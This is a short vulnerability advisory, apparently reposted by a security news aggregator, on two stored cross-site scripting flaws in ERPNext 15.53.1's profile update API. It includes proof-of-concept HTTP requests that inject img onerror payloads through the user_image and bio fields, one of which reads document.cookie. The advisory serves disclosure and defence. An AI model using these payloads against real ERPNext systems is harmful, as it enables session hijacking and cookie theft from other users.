ERPNext 15.53.1 Cross Site Scripting
文章描述了通过在用户资料页面的头像或个人简介字段中注入恶意JavaScript代码(XSS攻击),导致其他用户的浏览器执行存储的脚本。 2025-6-4 08:59:32 Author: cxsecurity.com(查看原文) 阅读量:18 收藏

An authenticated user can inject malicious JavaScript into the user_image field of the profile page using an XSS payload within the file path or HTML context. This field is rendered without sufficient sanitization, allowing stored script execution in the context of other authenticated users. *Proof of Concept:*POST /api/method/frappe.desk.page.user_profile.user_profile.update_profile_info HTTP/2 Host: --host-- profile_info={"user_image":"/private/files/\"><img src=x onerror=alert('XSS')>fd12cb.jpg"} --- packet storm appended second exploit --- An authenticated attacker can inject JavaScript into the bio field of their user profile. When the profile is viewed by another user, the injected script executes. *Proof of Concept:* POST /api/method/frappe.desk.page.user_profile.user_profile.update_profile_info HTTP/2 Host: --host-- profile_info={"bio":"\"><img src=x onerror=alert(document.cookie)>"}



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2025060003
如有侵权请联系:admin#unsafe.sh